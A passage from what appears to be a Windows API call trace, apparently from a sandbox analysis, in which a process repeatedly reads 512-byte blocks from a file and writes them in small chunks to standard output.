| out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.734] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.735] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 
[0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.736] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] GetFileType (hFile=0x4c) returned 0x1 [0092.737] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.737] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.737] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType 
(hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] GetFileType (hFile=0x4c) returned 0x1 [0092.738] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.738] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.738] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] GetFileType (hFile=0x4c) returned 0x1 [0092.739] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.739] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.739] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.739] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.739] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: 
hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] GetFileType (hFile=0x4c) returned 0x1 [0092.740] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.740] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.740] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.740] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.740] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c 
